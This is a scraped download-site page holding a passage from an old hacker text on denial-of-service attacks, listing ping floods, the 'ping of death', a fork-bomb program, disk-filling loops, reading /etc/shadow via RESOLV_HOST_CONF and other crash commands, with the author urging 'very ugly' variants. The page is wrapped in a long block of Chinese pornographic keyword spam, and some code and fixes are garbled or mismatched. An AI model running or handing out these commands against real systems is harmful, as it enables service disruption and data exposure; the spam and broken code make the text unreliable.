亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? introduction to denial of service.txt

?? 1000 HOWTOs for various needs [WINDOWS]
?? TXT
?? 第 1 頁 / 共 4 頁
字號:
	[.2.] http://jya.com/floodd.txt
	2600, Summer, 1996, pp. 6-11. FLOOD WARNING by Jason Fairlane

	[.3.] http://www.fc.net/phrack/files/p48/p48-14.html
	IP-spoofing Demystified by daemon9 / route / infinity
     	for Phrack Magazine

.C.23. PING FLOODING
--------------------

I haven't tested how big the impact of a ping flooding attack is, but
it might be quite big.

Under Unix we could try something like: ping -s host
to send 64 bytes packets. 

If you have Windows 95, click the start button, select RUN, then type
in: PING -T -L 256 xxx.xxx.xxx.xx. Start about 15 sessions.

.C.24. CRASHING SYSTEMS WITH PING FROM WINDOWS 95 MACHINES
----------------------------------------------------------

If someone can ping your machine from a Windows 95 machine he or she might
reboot or freeze your machine. The attacker simply writes:

ping -l 65510 address.to.the.machine

And the machine will freeze or reboot.

Works for kernel 2.0.7 up to version 2.0.20. and 2.1.1. for Linux (crash).
AIX4, OSF, HPUX 10.1, DUnix 4.0 (crash).
OSF/1, 3.2C, Solaris 2.4 x86 (reboot).

.C.25. MALICIOUS USE OF SUBNET MASK REPLY MESSAGE
--------------------------------------------------

The subnet mask reply message is used under the reboot, but some
hosts are known to accept the message any time without any check.
If so all communication to or from the host us turned off, it's dead.

The host should not accept the message any time but under the reboot.

.C.26. FLEXlm
-------------

Any host running FLEXlm can get the FLEXlm license manager daemon
on any network to shutdown using the FLEXlm lmdown command.

# lmdown -c /etc/licence.dat
lmdown - Copyright (C) 1989, 1991 Highland Software, Inc.

Shutting down FLEXlm on nodes: xxx
Are you sure? [y/n]: y
Shut down node xxx
#

.C.27. BOOTING WITH TRIVIAL FTP
-------------------------------

To boot diskless workstations one often use trivial ftp with rarp or
bootp. If not protected an attacker can use tftp to boot the host.


.D. ATTACKING FROM THE INSIDE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

.D.1. KERNEL PANIC UNDER SOLARIS 2.3
------------------------------------

Solaris 2.3 will get a kernel panic if this
is executed:

EX:
	
	$ndd /dev/udp udp_status

The solution is to install the proper patch.

.D.2. CRASHING THE X-SERVER
---------------------------

If stickybit is not set in /tmp then can the file /tmp/.x11-unix/x0
be removed and the x-server will crash.

Ex:

	$ rm /tmp/.x11-unix/x0

.D.3. FILLING UP THE HARD DISK
-----------------------------

If your hard disk space is not limited by a quota or if you can use
/tmp then it`s possible for you to fill up the file system.

Ex:

	while : ;
	mkdir .xxx
	cd .xxx
	done

.D.4. MALICIOUS USE OF eval
---------------------------

Some older systems will crash if eval '\!\!' is executed in the
C-shell.

Ex:
 
	% eval '\!\!'
	
.D.5. MALICIOUS USE OF fork() 
-----------------------------

If someone executes this C++ program the result will result in a crash
on most systems.

Ex:
	
	#include <sys/types.h>
	#include <unistd.h>
	#include <iostream.h>
	
	main()
	{
		int x;
		while(x=0;x<1000000;x++)
			{
				system("uptime");
				fork();
			}
	}

You can use any command you want, but uptime is nice
because it shows the workload.

To get a bigger and very ugly attack you should however replace uptime
(or fork them both) with sync. This is very bad.

If you are real mean you could also fork a child process for
every child process and we will get an exponential increase of
workload. 

There is no good way to stop this attack and
similar attacks. A solution could be to place a limit
on time of execution and size of processes.

.D.6. CREATING FILES THAT IS HARD TO REMOVE
-------------------------------------------

Well all files can be removed, but here is some ideas:

Ex.I.

	$ cat > -xxx
	^C
	$ ls
	-xxx
	$ rm -xxx
	rm: illegal option -- x
	rm: illegal option -- x
	rm: illegal option -- x
	usage: rm [-fiRr] file ...
	$

Ex.II.

	$ touch xxx!
	$ rm xxx!
	rm: remove xxx! (yes/no)? y
	$ touch xxxxxxxxx!
	$ rm xxxxxxxxx!
	bash: !": event not found
	$

	(You see the size do count!)

Other well know methods is files with odd characters or spaces
in the name. 

These methods could be used in combination with ".D.3 FILLING UP THE
HARDDISK". If you do want to remove these files you must use some sort
of script or a graphical interface like OpenWindow:s File
Manager. You can also try to use: rm ./<filename>. It should work for
the first example if you have a shell.

.D.7. DIRECTORY NAME LOOKUPCACHE
--------------------------------

Directory name lookupcache (DNLC) is used whenever a file is opened.
DNLC associates the name of the file to a vnode. But DNLC can only
operate on files with names that has less than N characters (for SunOS 4.x
up to 14 character, for Solaris 2.x up 30 characters). This means
that it's dead easy to launch a pretty discreet denial of service attack.

Create lets say 20 directories (for a start) and put 10 empty files in
every directory. Let every name have over 30 characters and execute a
script that makes a lot of ls -al on the directories.

If the impact is not big enough you should create more files or launch
more processes.
 
.D.8. CSH ATTACK
----------------

Just start this under /bin/csh (after proper modification) 
and the load level will get very high (that is 100% of the cpu time) 
in a very short time. 

Ex:

	|I /bin/csh
	nodename : **************b

.D.9. CREATING FILES IN /tmp
----------------------------

Many programs creates files in /tmp, but are unable to deal with the problem
if the file already exist. In some cases this could be used for a
denial of service attack.

.D.10. USING RESOLV_HOST_CONF
-----------------------------

Some systems have a little security hole in the way they use the
RESOLV_HOST_CONF variable. That is we can put things in it and
through ping access confidential data like /etc/shadow or
crash the system. Most systems will crash if /proc/kcore is 
read in the variable and access through ping.

Ex:
	
	$ export RESOLV_HOST_CONF="/proc/kcore" ; ping asdf

.D.11. SUN 4.X AND BACKGROUND JOBS	
----------------------------------

Thanks to Mr David Honig <honig@amada.net> for the following:

" Put the string "a&" in a file called "a" and perform "chmod +x a".
Running "a" will quickly disable a Sun 4.x machine, even disallowing
(counter to specs) root login as the kernel process table fills."

" The cute thing is the size of the 
script, and how few keystrokes it takes to bring down a Sun
as a regular user."

.D.12. CRASHING DG/UX WITH ULIMIT 
---------------------------------

ulimit is used to set a limit on the system resources available to the 
shell. If ulimit 0 is called before /etc/passwd, under DG/UX, will the 
passwd file be set to zero.

.D.13. NETTUNE AND HP-UX
------------------------

/usr/contrib/bin/nettune is SETUID root on HP-UX meaning
that any user can reset all ICMP, IP and TCP kernel
parameters, for example the following parameters:

	- arp_killcomplete 
	- arp_killincomplete
	- arp_unicast 
	- arp_rebroadcast
	- icmp_mask_agent
	- ip_defaultttl
	- ip_forwarding
	- ip_intrqmax
	- pmtu_defaulttime
	- tcp_localsubnets
	- tcp_receive
	- tcp_send
	- tcp_defaultttl
	- tcp_keepstart 
	- tcp_keepfreq
	- tcp_keepstop
	- tcp_maxretrans
	- tcp_urgent_data_ptr
	- udp_cksum
	- udp_defaultttl 
	- udp_newbcastenable 
	- udp_pmtu
	- tcp_pmtu
	- tcp_random_seq

The solution could be to set the proper permission on 
/sbin/mount_union:

#chmod u-s /sbin/mount_union

.D.14. SOLARIS 2.X AND NFS
--------------------------

If a process is writing over NFS and the user goes over the disk
quota will the process go into an infinite loop.

.D.15. SYSTEM STABILITY COMPROMISE VIA MOUNT_UNION
--------------------------------------------------

By executing a sequence of mount_union commands any user
can cause a system reload on all FreeBSD version 2.X before
1996-05-18.

$ mkdir a
$ mkdir b
$ mount_union ~/a ~/b
$ mount_union -b ~/a ~/b

The solution could be to set the proper permission on 
/sbin/mount_union:

#chmod u-s /sbin/mount_union

.D.16. trap_mon CAUSES KERNEL PANIC UNDER SUNOS 4.1.X
----------------------------------------------------

Executing the trap_mon instruction from user mode can cause
a kernel panic or a window underflow watchdog reset under
SunOS 4.1.x, sun4c architecture.


.E. DUMPING CORE
~~~~~~~~~~~~~~~~

.E.1. SHORT COMMENT
-------------------

The core dumps things don't really belongs in this paper but I have
put them here anyway.

.E.2. MALICIOUS USE OF NETSCAPE
-------------------------------

Under Netscape 1.1N this link will result in a segmentation fault and a
core dump.

Ex:

	<a name="http://xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.
	xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.
	xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.xxx.xxx.xxx.
	xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.
	xxx.xxx.xxx.xxx.xxxxxx.xxx.xxx.xxx.xxx.xxx...>

.E.3. CORE DUMPED UNDER WUFTPD
------------------------------

A core dumped could be created under wuftp with two different
methods:

	(1) Then pasv is given (user not logged in (ftp -n)). Almost all
	versions of BSD:s ftpd.
	(2) More than 100 arguments is given with any executable
	command. Presents in all versions of BSD:sd ftpd.

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
成人性生交大片免费看在线播放| 欧美日韩一卡二卡三卡| 成人午夜av电影| 色国产综合视频| 91小视频在线免费看| 正在播放亚洲一区| 国产欧美一区二区在线| 亚洲福利视频一区| 成人性色生活片| 日韩一区二区三| 亚洲特黄一级片| 亚洲第一电影网| 成人天堂资源www在线| 4438x亚洲最大成人网| 综合在线观看色| 日韩不卡一二三区| 99re热这里只有精品免费视频| 777xxx欧美| 亚洲欧美日韩电影| 成人美女视频在线观看18| 91精品欧美一区二区三区综合在 | 伦理电影国产精品| 91久久国产综合久久| 久久久国际精品| 日产欧产美韩系列久久99| 在线观看亚洲成人| 欧美国产精品劲爆| 国产麻豆91精品| 日韩视频永久免费| 五月天激情综合| 91精彩视频在线| 国产精品久久久久久久久晋中 | 26uuu精品一区二区在线观看| 亚洲综合色网站| 成人激情av网| 中文字幕一区二区在线播放| 国产精品伊人色| 精品国产制服丝袜高跟| 亚洲午夜一区二区三区| 91免费看片在线观看| 自拍偷在线精品自拍偷无码专区| 国产在线精品一区二区不卡了| 欧美一区二区三区爱爱| 亚洲一区二区三区不卡国产欧美| 色综合网站在线| 一区二区三区在线播放| 色播五月激情综合网| 亚洲精品视频在线看| 972aa.com艺术欧美| 亚洲男人都懂的| 91久久国产综合久久| 亚洲第一电影网| 91精品在线观看入口| 久久激情五月激情| 成人丝袜视频网| 在线不卡中文字幕| 国产二区国产一区在线观看| 欧美韩日一区二区三区| 在线视频中文字幕一区二区| 日产国产高清一区二区三区| 国产视频一区二区在线| 91论坛在线播放| 青青草伊人久久| 综合网在线视频| 欧美一级高清片| 91日韩精品一区| 久久精品免费看| 亚洲精品乱码久久久久久久久| 91精品国产综合久久国产大片| 国产精华液一区二区三区| 亚洲精品成人少妇| 精品国产乱码久久久久久牛牛 | 久久久777精品电影网影网| 成人不卡免费av| 奇米精品一区二区三区在线观看| 欧美韩日一区二区三区| 欧美日韩免费不卡视频一区二区三区| 日本视频免费一区| 亚洲人123区| 国产亚洲欧洲997久久综合| 欧美精品少妇一区二区三区 | 国产精品免费视频网站| 欧美放荡的少妇| 成人动漫av在线| 国产美女精品一区二区三区| 一二三四社区欧美黄| 国产精品久久久久三级| 日韩免费性生活视频播放| 欧亚一区二区三区| 99精品视频中文字幕| 国产成人综合亚洲91猫咪| 蜜臀精品久久久久久蜜臀| 亚洲一级电影视频| 亚洲日本va在线观看| 国产精品黄色在线观看| 国产欧美中文在线| 久久蜜桃一区二区| 日韩视频免费直播| 欧美一区二区三区人| 欧美色视频一区| 91成人免费网站| 欧洲国产伦久久久久久久| 91美女蜜桃在线| 91久久精品一区二区| 99国产精品视频免费观看| 国产剧情一区二区| 国产伦精品一区二区三区视频青涩 | 午夜精品久久久久久久久久久| 亚洲嫩草精品久久| 亚洲精品免费视频| 亚洲一区二区三区在线播放| 一区二区三区精品在线| 夜夜揉揉日日人人青青一国产精品 | 国产欧美日本一区视频| 久久精品夜色噜噜亚洲aⅴ| 欧美成人猛片aaaaaaa| 精品国产乱码91久久久久久网站| 日韩欧美一二区| 欧美成人vr18sexvr| 日韩免费在线观看| 国产亚洲精品久| 国产日韩av一区| 1区2区3区欧美| 午夜视黄欧洲亚洲| 欧美96一区二区免费视频| 免费精品视频在线| 国产精品1区二区.| 99精品热视频| 欧美日韩国产小视频在线观看| 欧美日韩色一区| 精品电影一区二区三区 | 2020国产精品自拍| 国产精品区一区二区三区| 亚洲欧美日韩精品久久久久| 亚洲国产综合在线| 久久成人麻豆午夜电影| 国产一区二区三区不卡在线观看| 丁香五精品蜜臀久久久久99网站| 91网站在线观看视频| 欧美人成免费网站| 日韩欧美专区在线| **网站欧美大片在线观看| 午夜日韩在线观看| 精品一区二区三区av| 成人av网站大全| 欧美精品丝袜中出| 国产精品私房写真福利视频| 亚洲综合激情网| 极品少妇一区二区三区精品视频 | 欧美顶级少妇做爰| 国产欧美日韩视频在线观看| 亚洲与欧洲av电影| 国产在线不卡一卡二卡三卡四卡| 不卡高清视频专区| 日韩欧美国产成人一区二区| 中文字幕中文乱码欧美一区二区| 偷拍与自拍一区| 99麻豆久久久国产精品免费| 欧美一区二区在线不卡| 最近中文字幕一区二区三区| 精品一区二区三区视频| 欧美性猛片aaaaaaa做受| 久久精品亚洲国产奇米99| 亚洲h动漫在线| 91在线云播放| 久久久久国产免费免费| 亚洲二区在线观看| 99视频国产精品| 国产无人区一区二区三区| 日欧美一区二区| 欧美视频精品在线| 中文字幕五月欧美| 国产一区二区三区精品欧美日韩一区二区三区 | 久久久国产综合精品女国产盗摄| 亚洲成人高清在线| 色狠狠色狠狠综合| 国产精品三级电影| 国产大陆a不卡| 精品国产亚洲一区二区三区在线观看| 亚洲午夜久久久久久久久电影网| av不卡在线观看| 国产精品免费免费| 国产乱一区二区| 久久蜜桃一区二区| 国产一区二区三区综合| 日韩欧美黄色影院| 免费在线看一区| 欧美一区二区三区视频在线| 亚洲成人免费av| 欧美精品自拍偷拍动漫精品| 一区二区久久久| 欧美亚洲日本一区| 一区二区三区四区在线| 97精品超碰一区二区三区| 中文字幕在线视频一区| gogogo免费视频观看亚洲一| 国产欧美精品在线观看| 成人精品鲁一区一区二区| 亚洲国产岛国毛片在线| 成人国产精品视频|